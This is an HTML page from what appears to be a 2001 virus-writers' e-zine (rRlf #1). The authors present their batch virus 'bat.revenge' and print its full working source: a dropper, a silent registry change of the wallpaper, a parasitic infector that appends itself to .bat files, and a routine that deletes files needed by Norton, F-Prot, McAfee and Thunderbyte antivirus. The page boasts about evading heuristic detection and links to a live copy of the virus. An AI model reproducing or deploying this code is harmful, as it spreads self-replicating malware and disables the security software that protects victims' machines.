<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="02.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="04.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>bat.revenge by philet0ast3r & rastafarie</u></b>
<p>This is my (philet0ast3r) sixt virus (my forth batch-virus), and it was written end of October 2001.
<br>End of September, "Pinoy Virus Writers E-Zine #6" should have come out, where the predecessor-virus
<br>(Final Fantasy 23 - The Forces in your Vacuum Cleaner) to this one, should have been released. But it is like always ...
<br>it is not out yet. As it seems the follow-up virus comes out before. Strange world.
<br>This virus is very similar to his predecessor, only a little step higher. It is the first (me known ... and I know many ;)
<br>batch-virus with a 16-million-color-payload, that does not use debug. And it was done, like its predecessor,
<br>again by two guys, the virus again was done by me, and the payload comes from rastafarie this time. And apart from that:
<br>-bat-infector
<br>-parasitic
<br>-retro: F-Prot 95, McAfee, Thunderbyte, Norton AntiVirus 2000 (it does not recognize the virus, even if heuristic is at maximum)
<br>-copies itself as call-back to the root-directory
<br>-payload: changes the wallpaper or makes the victim clear, that it is infected
<br>-fully compatible to Windows ME, Windows 98, Windows 95 (has been tested)
<br>-size: 112.640 bytes (virus plus payload); 1.160 bytes (the virus only)
<p>Well, and that is how this works:
<p>The "original"-virus has got the name:
<br>bat.revenge.exe
<br>This is a selfextracting zip-archiv (thanks to WinZip and Phrozen Crew at this place). It contains the following files:
<br>revenge.com
<br>revenge.dat
<br>revenge.exe
<br>revenge.ico
<br>revenge.sys
<br>(You should not have it too easy, opening the files...) At executing, all files are extracted to a temporary folder, and revenge.com gets executed.
<br>This is a batch-file in a com-file (yes, I refuse using something other than batch, and I know it would be much easier and more effective using
<br>a "real" language, but I am a Dos-phreak, and I do not want to give that stuff up, as long as it still works).
<br>"bat2com" by Foley Hi-Tech Systems (thanks to them at this place) was used for this.
<br>Script of the original-batch-file of revenge.com:
<p>@echo off
<br>ctty nul
<br>ren revenge.ico v0r.bat
<br>call v0r.bat
<br>:end
<p>As we see the file revenge.ico gets renamed to v0r.bat and then executed. This one does the following:
<p>@echo off
<br>ctty nul
<br>ren revenge.dat revenge.reg
<br>regedit /s revenge.reg
<br>move revenge.exe c:\windows
<br>ren c:\windows\revenge.exe revenge.bmp
<br>move revenge.sys c:\windows
<br>ren c:\windows\revenge.sys revenge.bat
<br>call c:\windows\revenge.bat
<br>ctty con
<br>:endv0r
<p>The file revenge.dat gets renamed to revenge.reg and then executed with the help of Regedit.
<br>The parameter s is undocumented and stands for silent, that means without asking the user to add the given information to the registry.
<br>The file revenge.reg looks like that:
<p>REGEDIT4
<p>[HKEY_CURRENT_USER\Control Panel\Desktop]
<br>"Wallpaper"="C:\\windows\\revenge.bmp"
<p>It is a standard-registry-file which contains data for a wallpaper.
<br>The above mentioned batch-file changes then the file revenge.exe to this wallpaper, which then shows up at the next system-start.
<br>Then the file revenge.sys gets moved to the windows-directory and then gets renamed to revenge.bat (the actual virus) and then executed.
<br>And here is the virus:
<p>@echo off%_revenge%
<br>if '%1=='revenge goto revenge%2
<br>set revenge=%0.bat
<br>if not exist %revenge% set revenge=%0
<br>if '%revenge%==' set revenge=autoexec.bat
<br>if exist c:\_revenge.bat goto revengeg
<br>if not exist %revenge% goto erevenge
<br>find "revenge"<%revenge%>c:\_revenge.bat
<br>attrib c:\_revenge.bat +h
<br>:revengeg
<br>command /c c:\_revenge revenge vir
<br>:erevenge
<br>ctty nul.revenge
<br>:r3tr0revenge
<br>if exist c:\_revenge.bat del c:\programme\norton~1\s32integ.dll
<br>if exist c:\_revenge.bat del c:\programme\f-prot95\fpwm32.dll
<br>if exist c:\_revenge.bat del c:\programme\mcafee\scan.dat
<br>if exist c:\_revenge.bat del c:\tbavw95\tbscan.sig
<br>:p4yl0adrevenge
<br>if exist c:\windows\revenge.bmp goto narevenge
<br>echo>revenge.inf you are infected with "bat.revenge" by PhileT0a$t3r [rRlf] & rastafarie [rRlf]
<br>move revenge.inf c:\windows\desktop
<br>:narevenge
<br>set revenge=
<br>goto revengeend
<br>:revengevir
<br>for %%a in (*.bat ..\*.bat c:*.bat) do call c:\_revenge revenge i %%a
<br>exit revenge
<br>:revengei
<br>find "revenge"<%3>nul
<br>if not errorlevel 1 goto revengeend
<br>type %3>revenge$
<br>echo.>>revenge$
<br>type c:\_revenge.bat>>revenge$
<br>move revenge$ %3>nul
<br>exit revenge
<br>:revengeend
<p>The virus itself has nothing really special. It does that, what a virus should do.
<br>The virus searches as long for not infected files, until it finds one, which it infects then (only one per run),
<br>or until it is running out of files. It contains a retro-routine, which deletes files, the above mentioned avs need to work.
<br>The payload first looks, if the wallpaper (c:\windows\revenge.bmp) is existing.
<br>If yes, it has already been installed before, and the virus can continue with its work.
<br>If it is not existing it has either been deleted or only the virus has been executed (without all the zip-file-stuff).
<br>In this case the file revenge.inf gets written and moved to the desktop. It contains the following:
<br>you are infected with "bat.revenge" by PhileT0a$t3r [rRlf] & rastafarie [rRlf]
<p><a href="03.jpg">look at the payload picture</a>
<p><a href="03.zip">living virus</a>
</body>
</html>
